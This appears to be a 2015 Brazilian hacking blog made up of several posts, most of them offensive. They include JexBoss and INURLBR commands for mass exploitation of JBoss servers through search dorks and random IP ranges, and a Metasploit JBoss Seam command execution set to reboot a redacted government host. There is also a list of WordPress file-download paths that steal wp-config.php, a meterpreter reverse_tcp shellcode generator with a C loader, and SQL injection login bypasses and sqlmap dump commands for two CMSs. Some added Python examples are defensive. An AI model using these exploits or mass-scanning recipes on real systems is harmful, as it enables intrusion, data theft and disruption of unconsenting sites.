
Friday, June 19, 2015

JexBoss - JBoss Verify Tool - INURLBR Mass Exploitation

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.


Requirements
Python 2.7.x (the script is Python 2 code)

Installation
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

#  [ + ] JexBoss v1.0. @author: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates: https://github.com/joaomatosf/jexboss
#  [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

  1. /jmx-console - tested and working on JBoss versions 4, 5 and 6
  2. /web-console/Invoker - tested and working on JBoss version 4
  3. /invoker/JMXInvokerServlet - tested and working on JBoss versions 4 and 5

The script works as published; we only changed the order of the exploit routines so that it can be driven in bulk by the inurlbr scanner.
All interactive prompts and confirmation questions were removed so it runs unattended, and a function was added that saves the vulnerable sites to a file.

Mass exploitation:
For this we use the inurlbr scanner.
Script modified for mass exploitation:
https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py 

SEARCH DORKS

inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"

INURLBR COMMANDS:
- Single search:
--dork {YOUR_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

- Search using a dorks file
- Example dorks file:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"
site:uk  inurl:"/web-console/Invoker"
site:ru  inurl:"/web-console/Invoker"
site:us  inurl:"/web-console/Invoker"
site:com  inurl:"/web-console/Invoker"
and so on...

Example: file dorks.txt
--dork-file {YOUR_DORK_FILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"


- Scanning an IP range: --range {IP_START,IP_END}

php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
- Random IP addresses: --range-rand {count}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
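The modified script only verifies the three vectors above and appends each exposed host to a file. The following Python 3 script is an added example, not JexBoss's or inurlbr's code, that does the same verification step on its own: it probes the three paths, decides exposure from the response, and writes hits to a file. The indicators are my assumptions, not something the post states: the jmx-console page is HTML that mentions JBoss or "JMX Agent View", while the two invoker servlets answer a plain GET with a serialized Java object, recognizable by the application/x-java-serialized-object content type or the 0xAC 0xED stream magic. The fetch function is injectable, and the responses in DEMO_RESPONSES are constructed so the script runs offline; it sends no exploit payload.

```python
"""Verify (without exploiting) whether a JBoss host exposes the three
management endpoints, and record exposed hosts to a file."""
import urllib.error
import urllib.request

# The three vectors from the post, in the order JexBoss tries them.
VECTORS = {
    "/jmx-console/HtmlAdaptor": "jmx-console",
    "/web-console/Invoker": "web-console",
    "/invoker/JMXInvokerServlet": "JMXInvokerServlet",
}
# Java serialization stream magic; the invoker servlets answer a plain GET
# with a serialized object (assumed indicator, see lead-in).
JAVA_SERIAL_MAGIC = b"\xac\xed"


def classify(path, status, content_type, body):
    """Return the vector name if the response shows an exposed endpoint, else None."""
    if status != 200:
        return None  # 401/403: present but protected; 404: absent
    name = VECTORS[path]
    if name == "jmx-console":
        if b"JMX Agent View" in body or b"jboss" in body.lower():
            return name
        return None
    if "x-java-serialized-object" in content_type.lower() or body.startswith(JAVA_SERIAL_MAGIC):
        return name
    return None


def http_fetch(url, timeout=8):
    """Live fetcher: returns (status, content-type, first 4 KiB of body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read(4096)
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", ""), b""
    except (urllib.error.URLError, OSError):
        return 0, "", b""


# Constructed responses for an offline run; not captured from a real server.
DEMO_RESPONSES = {
    "http://jboss.example.test:8080/jmx-console/HtmlAdaptor":
        (200, "text/html", b"<html><head><title>JBoss JMX Management Console</title>"),
    "http://jboss.example.test:8080/invoker/JMXInvokerServlet":
        (200, "application/x-java-serialized-object", b"\xac\xed\x00\x05sr"),
}


def demo_fetch(url):
    """Offline stand-in for http_fetch, answering from DEMO_RESPONSES."""
    return DEMO_RESPONSES.get(url, (404, "text/html", b"Not Found"))


def scan_host(base_url, fetch=http_fetch):
    """Probe every vector on one host; return the exposed vector names."""
    found = []
    for path in VECTORS:
        status, ctype, body = fetch(base_url.rstrip("/") + path)
        hit = classify(path, status, ctype, body)
        if hit:
            found.append(hit)
    return found


def scan_and_save(targets, out_path, fetch=http_fetch):
    """Scan each target and append 'host vector,vector' lines for exposed ones."""
    exposed = {}
    for target in targets:
        hits = scan_host(target, fetch)
        if hits:
            exposed[target] = hits
    with open(out_path, "a") as fh:
        for host, hits in exposed.items():
            fh.write("%s %s\n" % (host, ",".join(hits)))
    return exposed


if __name__ == "__main__":
    print(scan_and_save(["http://jboss.example.test:8080", "http://clean.example.test"],
                        "vulnerable_jboss.txt", demo_fetch))
```

A 401 or 403 on /jmx-console means the console exists but is password-protected; on an engagement that is still worth recording separately, but it is not what this check reports as exposed.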

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This module has also been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

  • METASPLOIT MODULE: auxiliary/admin/http/jboss_seam_exec
  • INURLBR SCANNER COMMAND: php inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
  • DORK: site:.gov.br inurl:.seam intitle:"JBoss Seam Debug"
Configuration:
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit


Friday, June 12, 2015

Internet Ungovernance Forum Brasil


Sem privacidade não há democracia!
There is no democracy without privacy!
No hay democracia sin privacidad!
Il n'y a pas de démocratie sans la vie privée!


Ab0ut
Internet Ungovernance Forum Brasil is for those of us who demand free, secure, and open internet for all!

We're organizing the Internet Ungovernance Forum on November 2015, for everyone who demand that fundamental freedoms, openness, unity and net neutrality remain the building blocks of the Internet. Our objective is to talk about the real problems of the internet, how we can solve these and to chart a path for action.

Our forum will be in parallel to the Internet Governance Forum (IGF) 2015 which will also be held in João Pessoa in november. Interested parties all around the world will join and follow this important event. We see that at IGF the most urgent problems of the Internet do not get the right attention. Due to the "multi-stakeholderism" format, the main perpetrators of many of the Internet's problems, governments and corporations, are getting representation in IGF they don’t deserve. Given these circumstances, we decided to take initiative to defend the Internet as we know it and to create a parallel space to raise the voices of civil society initiatives, activists and common people.

For us, the most vital problems today are censorship and freedom of speech; surveillance and privacy; excessive commercialization and super-monopolies; protective, prohibitionist and conservative governance approaches; awful governance examples as in the case of Brasil and the list goes on. Further, we do not see any of these problems independent of the greater political, social and economic contexts in which the Internet and related digital infrastructures are embedded in.

We want to reclaim the Internet as a fundamental infrastructure of our societies, cities, education, health, work, media, communications, culture and everyday activities.

We call on our participants to resist seeing the problems of the Internet as only technological and void of its materiality


Inv1t3d

  • JULIA REDA - German member of the European Parliament for the Pirate Party Germany and vice-president of the Greens/European Free Alliance.
  • AMELIA ANDERSDOTTER - Swedish activist, youngest member of the European Parliament in history (2011-2014), for the Piratpartiet.
  • FABIANE KRAVUTSCHKE - Activist for ecofeminism, transfeminism and animal rights. First Secretary of the Pirate Party Brazil.

Wednesday, June 10, 2015

Send Attack Web Forms - Tool

DESCRIPTION

The purpose of this tool is to be a Swiss army knife for anyone who works with HTTP. So far it is basic, bringing only a few of the features we want it to have, but it already offers:
  1. Email crawler for sites
  2. Form crawler for pages
  3. Link crawler for web pages
  4. Sending POST and GET requests
  5. Support for User-Agent
  6. Support for threads
  7. Support for cookies
Developed by

Danilo Vaz - UNK
[email protected]
http://unk-br.blogspot.com
https://twitter.com/unknownantisec


REQUIREMENTS
----------------------------------------------------------
  • Python modules:     threading, time, argparse, requests, json, re, BeautifulSoup
  • Permissions:        read and write
  • User:               root, or a member of the sudoers group
  • Operating system:   Linux
  • Python:             2.7
----------------------------------------------------------

INSTALL

git clone http://github.com/danilovazb/SAWEF

sudo apt-get install python-bs4 python-requests



HELP

usage: tool [-h] --url http://url.com/
            [--user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}']
            [--threads 10] [--data '{"data":"value","data1":"value"}']
            [--qtd 5] [--method post|get]
            [--referer '{"referer": "http://url.com"}']
            [--response status_code|headers|encoding|html|json|form]
            [--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=direct|utmccn=direct|utmcmd=none"}']

optional arguments:
  -h, --help        show this help message and exit
  --url http://url.com/
                    URL to request
  --user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'
                    For a longer list, visit:
                    http://www.useragentstring.com/pages/useragentstring.php
  --threads 10      Threads
  --data '{"data":"value","data1":"value"}'
                    Data to be transmitted by post
  --qtd 5           Quantity requests
  --method post|get
                    Method sends requests
  --referer '{"referer": "http://url.com"}'
                    Referer
  --response status_code|headers|encoding|html|json|form
                    Status return
  --cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"}'
                    Cookies from site
 

EXAMPLE

* Send one anonymous SMS via POST (Brazilian service):
----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/forms_teste/enviar.php" --data '{"celular":"(11) XXXX-XXXXX","mensagem":"Teste","Testar":"Enviar"}' --threads 10 --qtd 1 --user_agent '{"User-agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'
* List form attributes:

----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/" --method post --response form
 

 * Get e-mail addresses from web pages
----------------------------------------------------------
 $:> python sawef.py --url "http://pastebin.com/ajaYnLYc" --response emails
[...]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
FOUND = 3065

* Get links from web pages

----------------------------------------------------------
$:> python sawef.py --url "http://terra.com.br" --response links
[...]
[+] LINK = http://uol.com.br/https://pagseguro.uol.com.br/vender
[+] LINK = http://www.uolhost.com.br/registro-de-dominio.html
[+] LINK = http://noticias.uol.com.br/arquivohome/
[+] LINK = http://noticias.uol.com.br/erratas/
[+] LINK = http://uol.com.br/#
[+] FOUND = 360
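The three crawler modes above (forms, links, e-mails) come down to one HTML pass plus a regex. The following Python 3 script is an added example and not SAWEF's code: it reimplements that pass with the standard library only (html.parser instead of BeautifulSoup), resolving relative form actions and hrefs against the page URL and keeping the default values of inputs, which matters for a scripted POST because hidden fields such as CSRF tokens have to be replayed. SAMPLE_HTML is a constructed page, not a real site.

```python
"""Extract forms (with inputs), links and e-mail addresses from one HTML page."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class FormParser(HTMLParser):
    """Collects every <form> with its named inputs, and every <a href>."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "inputs": {},
            }
        elif tag in ("input", "textarea", "select") and self._current is not None:
            name = a.get("name")
            if name:
                # keep the server-supplied default: hidden CSRF tokens etc.
                self._current["inputs"][name] = a.get("value") or ""
        elif tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base_url, a["href"]))

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def extract(html, base_url):
    """Return (forms, links, emails) for one page body fetched from base_url."""
    parser = FormParser(base_url)
    parser.feed(html)
    parser.close()
    emails = sorted(set(EMAIL_RE.findall(html)))
    return parser.forms, parser.links, emails


# Constructed sample page (not a real site).
SAMPLE_HTML = """
<html><body>
<a href="/about">About</a> <a href="https://other.example/x">ext</a>
<form action="/login.php" method="POST">
  <input type="hidden" name="csrf" value="t0k3n">
  <input type="text" name="user"> <input type="password" name="pass">
  <input type="submit" name="Submit" value="Enter">
</form>
<p>Contact: admin@example.test, sales@example.test</p>
</body></html>
"""

if __name__ == "__main__":
    forms, links, emails = extract(SAMPLE_HTML, "http://www.example.test/index.php")
    for form in forms:
        print(form["method"].upper(), form["action"], form["inputs"])
    print(links)
    print(emails)
```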



Download tool:
https://github.com/danilovazb/SAWEF


Ref:
http://unk-br.blogspot.com.br/2015/06/send-attack-web-forms-tool.html

Tuesday, June 9, 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploiting a WordPress plugin LFI using inurlbr in subprocess mode


Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Create a file named payload.txt containing:
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

OTHER VULNERABLE PATHS (exploits):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique


SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

Friday, May 29, 2015

Shellcode injection into memory

#Shellcode [ REVERSE CONNECTION ] #Memory


  Hey folks, jh00n here again :)

  In this post I will cover injecting shellcode into memory, but first we have to generate the shellcode with msfpayload, which ships with the Metasploit Framework (msfpayload and msfencode have since been replaced by msfvenom, which does both steps in one command).

    

root@jh00n:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=445 R | msfencode -e x86/shikata_ga_nai -t c -a x86 -b '\x00\x0a' -c 5




  I generate the shellcode from the payload (windows/meterpreter/reverse_tcp). I set the IP of the machine the target will connect back to in LHOST and the port in LPORT, and finally pass R so that msfpayload returns the shellcode in (R)aw form, which is piped straight into msfencode.


   #Msfencode



msfencode -e x86/shikata_ga_nai -t c -a x86 -b '\x00\x0a' -c 5



  msfencode encodes the shellcode with the x86/shikata_ga_nai encoder. -c 5 sets the number of encoding iterations (five here) and -t c sets the output format to a C array. -a sets the architecture: windows/meterpreter/reverse_tcp is a 32-bit payload and shikata_ga_nai is an x86 encoder, so this has to be x86, not x64. -b lists the bad characters that must not appear in the encoded output, here \x00 and \x0a: a NUL byte would terminate the C string that holds the shellcode, and a line feed breaks many text-based delivery paths.
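Before compiling, it is worth confirming that the encoder really removed the characters passed with -b. The following Python 3 script is an added example, not part of Metasploit or of this post: it parses the C-format output that msfencode -t c prints (an unsigned char buf[] array made of "\x.." string literals) into bytes and reports the length and the offsets of any bad bytes left in it. SAMPLE_C is a constructed buffer in that layout, not a working payload.

```python
"""Parse msfencode -t c output and check it for bad characters."""
import re

# Constructed sample in the msfencode -t c layout (not a working payload).
SAMPLE_C = r'''
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x0a\x72\x28\x0f\xb7\x4a\x26\x31\xff";
'''


def parse_c_shellcode(text):
    """Return the bytes encoded by the \\xNN escapes inside the C string literals."""
    literals = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text)
    hexes = re.findall(r"\\x([0-9a-fA-F]{2})", "".join(literals))
    return bytes(int(h, 16) for h in hexes)


def find_bad_chars(shellcode, bad):
    """Return {byte_value: [offsets]} for every bad byte still present."""
    hits = {}
    for offset, value in enumerate(shellcode):
        if value in bad:
            hits.setdefault(value, []).append(offset)
    return hits


def check(text, bad=b"\x00\x0a"):
    """(length, bad-byte report) for one msfencode -t c output."""
    shellcode = parse_c_shellcode(text)
    return len(shellcode), find_bad_chars(shellcode, bad)


if __name__ == "__main__":
    length, report = check(SAMPLE_C)
    print("shellcode length:", length)
    for value, offsets in report.items():
        print("bad char 0x%02x at offsets %s" % (value, offsets))
```

If the report is not empty the encoder did not honour the bad-character list (or the wrong output was pasted); re-run msfencode rather than hand-editing the bytes.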


#Compiling

  I will use Dev-C++ to compile the program that runs the shellcode. Paste the C array printed by msfencode in place of "shellcode":

  /* encoded shellcode from msfencode -t c goes here */
  char code[] = "shellcode";

  int main(int argc, char **argv)
  {
     int (*func)();
     /* treat the buffer as a function and jump into it */
     func = (int (*)()) code;
     (*func)();
     return 0;
  }

  Note that on systems with DEP/NX enabled the .data section is not executable, so this call faults unless the buffer is placed in memory that is mapped executable (on Windows, VirtualAlloc with PAGE_EXECUTE_READWRITE before copying the shellcode in).


#Waiting for the connection

   


Monday, May 25, 2015

Presentation - Co0L BSidesSP v11 / Brazilian Arsenal - 24/05/2015

TOOL RELEASE: INURLBR 2.1 + mass exploitation concepts.



Once again I have the great satisfaction of taking part in the conference O Outro Lado - Security BSides São Paulo (Co0L BSidesSP), a mini-conference on information security organized by industry professionals with the support of the Garoa Hacker Clube, whose aim is to promote innovation, discussion and knowledge sharing and to spread the positive, innovative values of hacker culture.
I was placed in a track called Brazilian Arsenal, a space to showcase open source security tool projects developed by Brazilians, with the goal of publicizing these initiatives, encouraging the use of the tools and attracting more volunteers to the projects.
At the start, each project gets up to 10 minutes to present itself (lightning-talk pace). Then come hands-on activities chosen by each project's maintainer, which may include an installfest, a lab or even a hackathon where attendees are invited to develop a feature or fix a bug in the project.

Within that time I tried to pass on a few concepts for mass exploitation of targets, among them what I call a mini-exploit (a set of commands that chains several routines together, saving time) and what is new in the INURLBR 2.1 tool.

[ + ] Presentation outline:
Title: INURLBR 2.1 - Mass Exploit
Contents:
  • Basic introduction to the tool.
  • Explanation of what is new in the code.
  • The mini-exploit concept.
  • Building a mini-exploit.
  • Mini-exploit (Shellshock).
  • Mass exploitation with the Shellshock mini-exploit.
  • Mini-exploit (SQLMAP).
  • Mass exploitation with the SQLMAP mini-exploit.
  • Bot mode sending results to an IRC server.
  • Exploiting WordPress Arbitrary File Download.
  • Using subprocesses to save time.
  • Questions.
  • End.
PRESENTATION SLIDES
Download INURLBR 2.1


Sunday, May 17, 2015

Exploit 0day CMS HB 1.5


0day - PHP exploit for SQL injection (via GET/POST) in the Brazilian CMS HB, made by the company "Agência HB Web e Cia".



[+] Discovered by: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

[ + ] VULNERABILITY REPORTED:
May 15, 2015

[ + ] Type:
ADMINISTRATIVE PANEL ACCESS (SQL injection)

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version: 
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOUR_URL}/admin/logar.php
POST body: login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOUR_URL}/base.php?pagina=noticia&id=1 + (SQLi payload)
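The logar.php POC above is a login bypass that works because the submitted login and senha are spliced into the SQL text. The following Python 3 script is an added example, not the CMS's code: the admin table and the query shape are assumptions, SQLite stands in for MySQL, and since SQLite does not apply the MySQL coercion the page's payload depends on, the runnable bypass uses the classic ' OR '1'='1 payload; the page's own payload is rendered in render_page_payload() with a note on the MySQL rule that makes it work. The parameterized query beside it is the fix.

```python
"""Why the logar.php bypass works, and the query that stops it."""
import sqlite3


def make_db():
    """Constructed admin table with one account (sample data, not real)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, login TEXT, senha TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'admin', 's3cret')")
    return con


def build_query(login, senha):
    """Vulnerable: attacker-controlled strings become part of the SQL text."""
    return "SELECT id, login FROM admin WHERE login='%s' AND senha='%s'" % (login, senha)


def login_vulnerable(con, login, senha):
    """Returns matching rows; any row means the panel lets the user in."""
    return con.execute(build_query(login, senha)).fetchall()


def login_safe(con, login, senha):
    """Hardened: bound parameters never reach the SQL parser as syntax."""
    return con.execute(
        "SELECT id, login FROM admin WHERE login=? AND senha=?", (login, senha)
    ).fetchall()


def render_page_payload():
    """The POC's payload login='=' 'or' / senha='=' 'or', rendered but not run.

    The result is  WHERE login=''=' 'or'' AND senha=''=' 'or''  which MySQL
    parses as ((login='')=' ') OR ('' AND (senha='')=' ') OR ''. For any
    non-empty login, login='' is 0, and MySQL coerces the string ' ' to 0 in
    the comparison, so 0=0 is true and every row matches. SQLite never
    equates an integer with a text value, hence the classic payload below.
    """
    return build_query("'=' 'or'", "'=' 'or'")


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, payload))
    print("safe:      ", login_safe(db, payload, payload))
    print(render_page_payload())
```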

[ + ] SQLMAP exploitation output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOUR_URL}/base.php?pagina=noticia&id=1' \
  --dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118' \
  --dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only \
  --flush-session --batch

[ + ] EXECUTE: 
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt


[ + ] Exploit: 
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] MASS EXPLOITATION WITH THE INURLBR SCANNER:
php inurlbr.php --dork 'inurl:"base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'


More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

Wednesday, May 13, 2015

Web India Solutions CMS 2015 - SQL Injection Vulnerability

SQLi VULNERABILITY IN THE INDIAN CMS Web India Solutions CMS 2015


[ + ] References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1495

[ + ] Release Date:
2015-05-13
[ + ] Vulnerability Laboratory ID (VL-ID):
1495
[ + ] Common Vulnerability Scoring System:
8.3
[ + ] Product & Service Introduction:
Our Website Designing and Development services include Website redesigning, creation of Responsive Websites, Website content updates, 
E-commerce Website designing etc. You can contact us for all the website related services. We use HTML5, CSS3, JavaScript, Ajax, PHP, 
WordPress and Joomla for Development and Content Management.

(Copy of the Vendor Homepage: http://www.webindiasolutions.com/ )


[ + ] Abstract Advisory Information:
An independent Vulnerability Laboratory researcher discovered a remote SQL injection web vulnerability in the official Web India Solutions CMS (2015 Q2).

[ + ] Vulnerability Disclosure Timeline:
2015-05-13: Public Disclosure (Vulnerability Laboratory)

[ + ] Discovery Status:
Published

[ + ] Affected Product(s):
Web India Solutions
Product: Content Management System 2015 Q2

[ + ] Exploitation Technique:
Remote

[ + ] Severity Level:
High

[ + ] Technical Details & Description:
Multiple remote SQL injection vulnerabilities have been discovered in the official Web India Solutions Content Management System (2015 Q2).
The vulnerabilities allow remote attackers to execute their own SQL commands and compromise the web application or the database management system.

The vulnerabilities are located in the id value of the `departments.php`, `offers.php` and `photogallery_view.php` files. Remote attackers are
able to execute their own SQL commands by manipulating the vulnerable id value in a GET request. The request method used to inject the
command is GET and the issue is located on the application side.

The security risk of the SQL injection vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 8.3.
Exploitation of the remote SQL injection web vulnerability requires no user interaction and no privileged web application user account.
Successful exploitation of the remote SQL injection results in DBMS, web server and web application compromise.

Request Method(s):   GET
Vulnerable File(s):  departments.php, offers.php, photogallery_view.php
Vulnerable Parameter(s): id

[ + ] Proof of Concept (PoC):
The remote sql injection web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.

[ + ] Dork(s):
intext:"Website Development Web India Solutions" +inurl:.php?id=  
intext:"Web India Solutions" & inurl:"php?id="
[ + ] PoC: Payload(s):
https://www.[SITE].com/anyinfectedfile.php?id=(ID)+XPL

[ + ] SQLMAP Payload(s):
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=34' AND 4678=4678#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=34' AND (SELECT * FROM (SELECT(SLEEP(5)))mQsU)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-4358' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a766a71,0x674c4e4756745179796a,0x7178767871),NULL,NULL,NULL,NULL#

[ + ] COMMAND(s) SQLMAP:
sqlmap -u "http://www.site.com/filevuln.php?id=(ID)" --dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) -D [DB_NAME] --tables --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) --dump -D [DB_NAME] -T cms_admin --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast
